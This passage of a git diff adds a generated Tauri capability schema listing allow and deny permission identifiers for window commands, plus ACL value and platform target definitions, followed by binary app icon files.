"Enables the activity_name command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-activity-name", + "markdownDescription": "Enables the activity_name command without any pre-configured scope." + }, + { + "description": "Enables the available_monitors command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-available-monitors", + "markdownDescription": "Enables the available_monitors command without any pre-configured scope." + }, + { + "description": "Enables the center command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-center", + "markdownDescription": "Enables the center command without any pre-configured scope." + }, + { + "description": "Enables the close command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-close", + "markdownDescription": "Enables the close command without any pre-configured scope." + }, + { + "description": "Enables the create command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-create", + "markdownDescription": "Enables the create command without any pre-configured scope." + }, + { + "description": "Enables the current_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-current-monitor", + "markdownDescription": "Enables the current_monitor command without any pre-configured scope." + }, + { + "description": "Enables the cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-cursor-position", + "markdownDescription": "Enables the cursor_position command without any pre-configured scope." + }, + { + "description": "Enables the destroy command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-destroy", + "markdownDescription": "Enables the destroy command without any pre-configured scope." + }, + { + "description": "Enables the get_all_windows command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-get-all-windows", + "markdownDescription": "Enables the get_all_windows command without any pre-configured scope." + }, + { + "description": "Enables the hide command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-hide", + "markdownDescription": "Enables the hide command without any pre-configured scope." + }, + { + "description": "Enables the inner_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-inner-position", + "markdownDescription": "Enables the inner_position command without any pre-configured scope." + }, + { + "description": "Enables the inner_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-inner-size", + "markdownDescription": "Enables the inner_size command without any pre-configured scope." + }, + { + "description": "Enables the internal_toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-internal-toggle-maximize", + "markdownDescription": "Enables the internal_toggle_maximize command without any pre-configured scope." + }, + { + "description": "Enables the is_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-always-on-top", + "markdownDescription": "Enables the is_always_on_top command without any pre-configured scope." + }, + { + "description": "Enables the is_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-closable", + "markdownDescription": "Enables the is_closable command without any pre-configured scope." + }, + { + "description": "Enables the is_decorated command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-decorated", + "markdownDescription": "Enables the is_decorated command without any pre-configured scope." + }, + { + "description": "Enables the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-enabled", + "markdownDescription": "Enables the is_enabled command without any pre-configured scope." + }, + { + "description": "Enables the is_focused command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-focused", + "markdownDescription": "Enables the is_focused command without any pre-configured scope." + }, + { + "description": "Enables the is_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-fullscreen", + "markdownDescription": "Enables the is_fullscreen command without any pre-configured scope." + }, + { + "description": "Enables the is_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-maximizable", + "markdownDescription": "Enables the is_maximizable command without any pre-configured scope." + }, + { + "description": "Enables the is_maximized command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-maximized", + "markdownDescription": "Enables the is_maximized command without any pre-configured scope." + }, + { + "description": "Enables the is_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-minimizable", + "markdownDescription": "Enables the is_minimizable command without any pre-configured scope." + }, + { + "description": "Enables the is_minimized command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-minimized", + "markdownDescription": "Enables the is_minimized command without any pre-configured scope." + }, + { + "description": "Enables the is_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-resizable", + "markdownDescription": "Enables the is_resizable command without any pre-configured scope." + }, + { + "description": "Enables the is_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-is-visible", + "markdownDescription": "Enables the is_visible command without any pre-configured scope." + }, + { + "description": "Enables the maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-maximize", + "markdownDescription": "Enables the maximize command without any pre-configured scope." + }, + { + "description": "Enables the minimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-minimize", + "markdownDescription": "Enables the minimize command without any pre-configured scope." + }, + { + "description": "Enables the monitor_from_point command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-monitor-from-point", + "markdownDescription": "Enables the monitor_from_point command without any pre-configured scope." + }, + { + "description": "Enables the outer_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-outer-position", + "markdownDescription": "Enables the outer_position command without any pre-configured scope." + }, + { + "description": "Enables the outer_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-outer-size", + "markdownDescription": "Enables the outer_size command without any pre-configured scope." + }, + { + "description": "Enables the primary_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-primary-monitor", + "markdownDescription": "Enables the primary_monitor command without any pre-configured scope." + }, + { + "description": "Enables the request_user_attention command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-request-user-attention", + "markdownDescription": "Enables the request_user_attention command without any pre-configured scope." + }, + { + "description": "Enables the scale_factor command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-scale-factor", + "markdownDescription": "Enables the scale_factor command without any pre-configured scope." + }, + { + "description": "Enables the scene_identifier command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-scene-identifier", + "markdownDescription": "Enables the scene_identifier command without any pre-configured scope." + }, + { + "description": "Enables the set_always_on_bottom command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-always-on-bottom", + "markdownDescription": "Enables the set_always_on_bottom command without any pre-configured scope." + }, + { + "description": "Enables the set_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-always-on-top", + "markdownDescription": "Enables the set_always_on_top command without any pre-configured scope." + }, + { + "description": "Enables the set_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-background-color", + "markdownDescription": "Enables the set_background_color command without any pre-configured scope." + }, + { + "description": "Enables the set_badge_count command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-badge-count", + "markdownDescription": "Enables the set_badge_count command without any pre-configured scope." + }, + { + "description": "Enables the set_badge_label command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-badge-label", + "markdownDescription": "Enables the set_badge_label command without any pre-configured scope." + }, + { + "description": "Enables the set_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-closable", + "markdownDescription": "Enables the set_closable command without any pre-configured scope." + }, + { + "description": "Enables the set_content_protected command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-content-protected", + "markdownDescription": "Enables the set_content_protected command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_grab command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-grab", + "markdownDescription": "Enables the set_cursor_grab command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-icon", + "markdownDescription": "Enables the set_cursor_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-position", + "markdownDescription": "Enables the set_cursor_position command without any pre-configured scope." + }, + { + "description": "Enables the set_cursor_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-cursor-visible", + "markdownDescription": "Enables the set_cursor_visible command without any pre-configured scope." + }, + { + "description": "Enables the set_decorations command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-decorations", + "markdownDescription": "Enables the set_decorations command without any pre-configured scope." + }, + { + "description": "Enables the set_effects command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-effects", + "markdownDescription": "Enables the set_effects command without any pre-configured scope." + }, + { + "description": "Enables the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-enabled", + "markdownDescription": "Enables the set_enabled command without any pre-configured scope." + }, + { + "description": "Enables the set_focus command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-focus", + "markdownDescription": "Enables the set_focus command without any pre-configured scope." + }, + { + "description": "Enables the set_focusable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-focusable", + "markdownDescription": "Enables the set_focusable command without any pre-configured scope." + }, + { + "description": "Enables the set_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-fullscreen", + "markdownDescription": "Enables the set_fullscreen command without any pre-configured scope." + }, + { + "description": "Enables the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-icon", + "markdownDescription": "Enables the set_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_ignore_cursor_events command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-ignore-cursor-events", + "markdownDescription": "Enables the set_ignore_cursor_events command without any pre-configured scope." + }, + { + "description": "Enables the set_max_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-max-size", + "markdownDescription": "Enables the set_max_size command without any pre-configured scope." + }, + { + "description": "Enables the set_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-maximizable", + "markdownDescription": "Enables the set_maximizable command without any pre-configured scope." + }, + { + "description": "Enables the set_min_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-min-size", + "markdownDescription": "Enables the set_min_size command without any pre-configured scope." + }, + { + "description": "Enables the set_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-minimizable", + "markdownDescription": "Enables the set_minimizable command without any pre-configured scope." + }, + { + "description": "Enables the set_overlay_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-overlay-icon", + "markdownDescription": "Enables the set_overlay_icon command without any pre-configured scope." + }, + { + "description": "Enables the set_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-position", + "markdownDescription": "Enables the set_position command without any pre-configured scope." + }, + { + "description": "Enables the set_progress_bar command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-progress-bar", + "markdownDescription": "Enables the set_progress_bar command without any pre-configured scope." + }, + { + "description": "Enables the set_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-resizable", + "markdownDescription": "Enables the set_resizable command without any pre-configured scope." + }, + { + "description": "Enables the set_shadow command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-shadow", + "markdownDescription": "Enables the set_shadow command without any pre-configured scope." + }, + { + "description": "Enables the set_simple_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-simple-fullscreen", + "markdownDescription": "Enables the set_simple_fullscreen command without any pre-configured scope." + }, + { + "description": "Enables the set_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-size", + "markdownDescription": "Enables the set_size command without any pre-configured scope." + }, + { + "description": "Enables the set_size_constraints command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-size-constraints", + "markdownDescription": "Enables the set_size_constraints command without any pre-configured scope." + }, + { + "description": "Enables the set_skip_taskbar command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-skip-taskbar", + "markdownDescription": "Enables the set_skip_taskbar command without any pre-configured scope." + }, + { + "description": "Enables the set_theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-theme", + "markdownDescription": "Enables the set_theme command without any pre-configured scope." + }, + { + "description": "Enables the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-title", + "markdownDescription": "Enables the set_title command without any pre-configured scope." + }, + { + "description": "Enables the set_title_bar_style command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-title-bar-style", + "markdownDescription": "Enables the set_title_bar_style command without any pre-configured scope." + }, + { + "description": "Enables the set_visible_on_all_workspaces command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-set-visible-on-all-workspaces", + "markdownDescription": "Enables the set_visible_on_all_workspaces command without any pre-configured scope." + }, + { + "description": "Enables the show command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-show", + "markdownDescription": "Enables the show command without any pre-configured scope." + }, + { + "description": "Enables the start_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-start-dragging", + "markdownDescription": "Enables the start_dragging command without any pre-configured scope." + }, + { + "description": "Enables the start_resize_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-start-resize-dragging", + "markdownDescription": "Enables the start_resize_dragging command without any pre-configured scope." + }, + { + "description": "Enables the theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-theme", + "markdownDescription": "Enables the theme command without any pre-configured scope." + }, + { + "description": "Enables the title command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-title", + "markdownDescription": "Enables the title command without any pre-configured scope." + }, + { + "description": "Enables the toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-toggle-maximize", + "markdownDescription": "Enables the toggle_maximize command without any pre-configured scope." + }, + { + "description": "Enables the unmaximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-unmaximize", + "markdownDescription": "Enables the unmaximize command without any pre-configured scope." + }, + { + "description": "Enables the unminimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:allow-unminimize", + "markdownDescription": "Enables the unminimize command without any pre-configured scope." + }, + { + "description": "Denies the activity_name command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-activity-name", + "markdownDescription": "Denies the activity_name command without any pre-configured scope." + }, + { + "description": "Denies the available_monitors command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-available-monitors", + "markdownDescription": "Denies the available_monitors command without any pre-configured scope." + }, + { + "description": "Denies the center command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-center", + "markdownDescription": "Denies the center command without any pre-configured scope." + }, + { + "description": "Denies the close command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-close", + "markdownDescription": "Denies the close command without any pre-configured scope." + }, + { + "description": "Denies the create command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-create", + "markdownDescription": "Denies the create command without any pre-configured scope." + }, + { + "description": "Denies the current_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-current-monitor", + "markdownDescription": "Denies the current_monitor command without any pre-configured scope." + }, + { + "description": "Denies the cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-cursor-position", + "markdownDescription": "Denies the cursor_position command without any pre-configured scope." + }, + { + "description": "Denies the destroy command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-destroy", + "markdownDescription": "Denies the destroy command without any pre-configured scope." + }, + { + "description": "Denies the get_all_windows command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-get-all-windows", + "markdownDescription": "Denies the get_all_windows command without any pre-configured scope." + }, + { + "description": "Denies the hide command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-hide", + "markdownDescription": "Denies the hide command without any pre-configured scope." + }, + { + "description": "Denies the inner_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-inner-position", + "markdownDescription": "Denies the inner_position command without any pre-configured scope." + }, + { + "description": "Denies the inner_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-inner-size", + "markdownDescription": "Denies the inner_size command without any pre-configured scope." + }, + { + "description": "Denies the internal_toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-internal-toggle-maximize", + "markdownDescription": "Denies the internal_toggle_maximize command without any pre-configured scope." + }, + { + "description": "Denies the is_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-always-on-top", + "markdownDescription": "Denies the is_always_on_top command without any pre-configured scope." + }, + { + "description": "Denies the is_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-closable", + "markdownDescription": "Denies the is_closable command without any pre-configured scope." + }, + { + "description": "Denies the is_decorated command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-decorated", + "markdownDescription": "Denies the is_decorated command without any pre-configured scope." + }, + { + "description": "Denies the is_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-enabled", + "markdownDescription": "Denies the is_enabled command without any pre-configured scope." + }, + { + "description": "Denies the is_focused command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-focused", + "markdownDescription": "Denies the is_focused command without any pre-configured scope." + }, + { + "description": "Denies the is_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-fullscreen", + "markdownDescription": "Denies the is_fullscreen command without any pre-configured scope." + }, + { + "description": "Denies the is_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-maximizable", + "markdownDescription": "Denies the is_maximizable command without any pre-configured scope." + }, + { + "description": "Denies the is_maximized command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-maximized", + "markdownDescription": "Denies the is_maximized command without any pre-configured scope." + }, + { + "description": "Denies the is_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-minimizable", + "markdownDescription": "Denies the is_minimizable command without any pre-configured scope." + }, + { + "description": "Denies the is_minimized command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-minimized", + "markdownDescription": "Denies the is_minimized command without any pre-configured scope." + }, + { + "description": "Denies the is_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-resizable", + "markdownDescription": "Denies the is_resizable command without any pre-configured scope." + }, + { + "description": "Denies the is_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-is-visible", + "markdownDescription": "Denies the is_visible command without any pre-configured scope." + }, + { + "description": "Denies the maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-maximize", + "markdownDescription": "Denies the maximize command without any pre-configured scope." + }, + { + "description": "Denies the minimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-minimize", + "markdownDescription": "Denies the minimize command without any pre-configured scope." + }, + { + "description": "Denies the monitor_from_point command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-monitor-from-point", + "markdownDescription": "Denies the monitor_from_point command without any pre-configured scope." + }, + { + "description": "Denies the outer_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-outer-position", + "markdownDescription": "Denies the outer_position command without any pre-configured scope." + }, + { + "description": "Denies the outer_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-outer-size", + "markdownDescription": "Denies the outer_size command without any pre-configured scope." + }, + { + "description": "Denies the primary_monitor command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-primary-monitor", + "markdownDescription": "Denies the primary_monitor command without any pre-configured scope." + }, + { + "description": "Denies the request_user_attention command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-request-user-attention", + "markdownDescription": "Denies the request_user_attention command without any pre-configured scope." + }, + { + "description": "Denies the scale_factor command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-scale-factor", + "markdownDescription": "Denies the scale_factor command without any pre-configured scope." + }, + { + "description": "Denies the scene_identifier command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-scene-identifier", + "markdownDescription": "Denies the scene_identifier command without any pre-configured scope." + }, + { + "description": "Denies the set_always_on_bottom command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-always-on-bottom", + "markdownDescription": "Denies the set_always_on_bottom command without any pre-configured scope." + }, + { + "description": "Denies the set_always_on_top command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-always-on-top", + "markdownDescription": "Denies the set_always_on_top command without any pre-configured scope." + }, + { + "description": "Denies the set_background_color command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-background-color", + "markdownDescription": "Denies the set_background_color command without any pre-configured scope." + }, + { + "description": "Denies the set_badge_count command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-badge-count", + "markdownDescription": "Denies the set_badge_count command without any pre-configured scope." + }, + { + "description": "Denies the set_badge_label command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-badge-label", + "markdownDescription": "Denies the set_badge_label command without any pre-configured scope." + }, + { + "description": "Denies the set_closable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-closable", + "markdownDescription": "Denies the set_closable command without any pre-configured scope." + }, + { + "description": "Denies the set_content_protected command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-content-protected", + "markdownDescription": "Denies the set_content_protected command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_grab command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-grab", + "markdownDescription": "Denies the set_cursor_grab command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-icon", + "markdownDescription": "Denies the set_cursor_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-position", + "markdownDescription": "Denies the set_cursor_position command without any pre-configured scope." + }, + { + "description": "Denies the set_cursor_visible command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-cursor-visible", + "markdownDescription": "Denies the set_cursor_visible command without any pre-configured scope." + }, + { + "description": "Denies the set_decorations command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-decorations", + "markdownDescription": "Denies the set_decorations command without any pre-configured scope." + }, + { + "description": "Denies the set_effects command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-effects", + "markdownDescription": "Denies the set_effects command without any pre-configured scope." + }, + { + "description": "Denies the set_enabled command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-enabled", + "markdownDescription": "Denies the set_enabled command without any pre-configured scope." + }, + { + "description": "Denies the set_focus command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-focus", + "markdownDescription": "Denies the set_focus command without any pre-configured scope." + }, + { + "description": "Denies the set_focusable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-focusable", + "markdownDescription": "Denies the set_focusable command without any pre-configured scope." + }, + { + "description": "Denies the set_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-fullscreen", + "markdownDescription": "Denies the set_fullscreen command without any pre-configured scope." + }, + { + "description": "Denies the set_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-icon", + "markdownDescription": "Denies the set_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_ignore_cursor_events command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-ignore-cursor-events", + "markdownDescription": "Denies the set_ignore_cursor_events command without any pre-configured scope." + }, + { + "description": "Denies the set_max_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-max-size", + "markdownDescription": "Denies the set_max_size command without any pre-configured scope." + }, + { + "description": "Denies the set_maximizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-maximizable", + "markdownDescription": "Denies the set_maximizable command without any pre-configured scope." + }, + { + "description": "Denies the set_min_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-min-size", + "markdownDescription": "Denies the set_min_size command without any pre-configured scope." + }, + { + "description": "Denies the set_minimizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-minimizable", + "markdownDescription": "Denies the set_minimizable command without any pre-configured scope." + }, + { + "description": "Denies the set_overlay_icon command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-overlay-icon", + "markdownDescription": "Denies the set_overlay_icon command without any pre-configured scope." + }, + { + "description": "Denies the set_position command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-position", + "markdownDescription": "Denies the set_position command without any pre-configured scope." + }, + { + "description": "Denies the set_progress_bar command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-progress-bar", + "markdownDescription": "Denies the set_progress_bar command without any pre-configured scope." + }, + { + "description": "Denies the set_resizable command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-resizable", + "markdownDescription": "Denies the set_resizable command without any pre-configured scope." + }, + { + "description": "Denies the set_shadow command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-shadow", + "markdownDescription": "Denies the set_shadow command without any pre-configured scope." + }, + { + "description": "Denies the set_simple_fullscreen command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-simple-fullscreen", + "markdownDescription": "Denies the set_simple_fullscreen command without any pre-configured scope." + }, + { + "description": "Denies the set_size command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-size", + "markdownDescription": "Denies the set_size command without any pre-configured scope." + }, + { + "description": "Denies the set_size_constraints command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-size-constraints", + "markdownDescription": "Denies the set_size_constraints command without any pre-configured scope." + }, + { + "description": "Denies the set_skip_taskbar command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-skip-taskbar", + "markdownDescription": "Denies the set_skip_taskbar command without any pre-configured scope." + }, + { + "description": "Denies the set_theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-theme", + "markdownDescription": "Denies the set_theme command without any pre-configured scope." + }, + { + "description": "Denies the set_title command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-title", + "markdownDescription": "Denies the set_title command without any pre-configured scope." + }, + { + "description": "Denies the set_title_bar_style command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-title-bar-style", + "markdownDescription": "Denies the set_title_bar_style command without any pre-configured scope." + }, + { + "description": "Denies the set_visible_on_all_workspaces command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-set-visible-on-all-workspaces", + "markdownDescription": "Denies the set_visible_on_all_workspaces command without any pre-configured scope." + }, + { + "description": "Denies the show command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-show", + "markdownDescription": "Denies the show command without any pre-configured scope." + }, + { + "description": "Denies the start_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-start-dragging", + "markdownDescription": "Denies the start_dragging command without any pre-configured scope." + }, + { + "description": "Denies the start_resize_dragging command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-start-resize-dragging", + "markdownDescription": "Denies the start_resize_dragging command without any pre-configured scope." + }, + { + "description": "Denies the theme command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-theme", + "markdownDescription": "Denies the theme command without any pre-configured scope." + }, + { + "description": "Denies the title command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-title", + "markdownDescription": "Denies the title command without any pre-configured scope." + }, + { + "description": "Denies the toggle_maximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-toggle-maximize", + "markdownDescription": "Denies the toggle_maximize command without any pre-configured scope." + }, + { + "description": "Denies the unmaximize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-unmaximize", + "markdownDescription": "Denies the unmaximize command without any pre-configured scope." + }, + { + "description": "Denies the unminimize command without any pre-configured scope.", + "type": "string", + "const": "core:window:deny-unminimize", + "markdownDescription": "Denies the unminimize command without any pre-configured scope." + } + ] + }, + "Value": { + "description": "All supported ACL values.", + "anyOf": [ + { + "description": "Represents a null JSON value.", + "type": "null" + }, + { + "description": "Represents a [`bool`].", + "type": "boolean" + }, + { + "description": "Represents a valid ACL [`Number`].", + "allOf": [ + { + "$ref": "#/definitions/Number" + } + ] + }, + { + "description": "Represents a [`String`].", + "type": "string" + }, + { + "description": "Represents a list of other [`Value`]s.", + "type": "array", + "items": { + "$ref": "#/definitions/Value" + } + }, + { + "description": "Represents a map of [`String`] keys to [`Value`]s.", + "type": "object", + "additionalProperties": { + "$ref": "#/definitions/Value" + } + } + ] + }, + "Number": { + "description": "A valid ACL number.", + "anyOf": [ + { + "description": "Represents an [`i64`].", + "type": "integer", + "format": "int64" + }, + { + "description": "Represents a [`f64`].", + "type": "number", + "format": "double" + } + ] + }, + "Target": { + "description": "Platform target.", + "oneOf": [ + { + "description": "MacOS.", + "type": "string", + "enum": [ + "macOS" + ] + }, + { + "description": "Windows.", + "type": "string", + "enum": [ + "windows" + ] + }, + { + "description": "Linux.", + "type": "string", + "enum": [ + "linux" + ] + }, + { + "description": "Android.", + "type": "string", + "enum": [ + "android" + ] + }, + { + "description": "iOS.", + "type": "string", + "enum": [ + "iOS" + ] + } + ] + } + } +} \ No newline at end of file diff --git a/ui/src-tauri/icons/128x128.png b/ui/src-tauri/icons/128x128.png new file mode 100644 index 0000000..8c3dfbc Binary files /dev/null and b/ui/src-tauri/icons/128x128.png differ diff --git a/ui/src-tauri/icons/128x128@2x.png b/ui/src-tauri/icons/128x128@2x.png new file mode 100644 index 0000000..3b54719 Binary files /dev/null and b/ui/src-tauri/icons/128x128@2x.png differ diff --git a/ui/src-tauri/icons/32x32.png b/ui/src-tauri/icons/32x32.png new file mode 100644 index 0000000..0b31cec Binary files /dev/null and b/ui/src-tauri/icons/32x32.png differ diff --git a/ui/src-tauri/icons/64x64.png b/ui/src-tauri/icons/64x64.png new file mode 100644 index 0000000..6f89c7b Binary files /dev/null and b/ui/src-tauri/icons/64x64.png differ diff --git a/ui/src-tauri/icons/Square107x107Logo.png b/ui/src-tauri/icons/Square107x107Logo.png new file mode 100644 index 0000000..5c24a24 Binary files /dev/null and b/ui/src-tauri/icons/Square107x107Logo.png differ diff --git a/ui/src-tauri/icons/Square142x142Logo.png b/ui/src-tauri/icons/Square142x142Logo.png new file mode 100644 index 0000000..dc0afe7 Binary files /dev/null and b/ui/src-tauri/icons/Square142x142Logo.png differ diff --git a/ui/src-tauri/icons/Square150x150Logo.png b/ui/src-tauri/icons/Square150x150Logo.png new file mode 100644 index 0000000..b6c8b5c Binary files /dev/null and b/ui/src-tauri/icons/Square150x150Logo.png differ diff --git a/ui/src-tauri/icons/Square284x284Logo.png b/ui/src-tauri/icons/Square284x284Logo.png new file mode 100644 index 0000000..3010866 Binary files /dev/null and 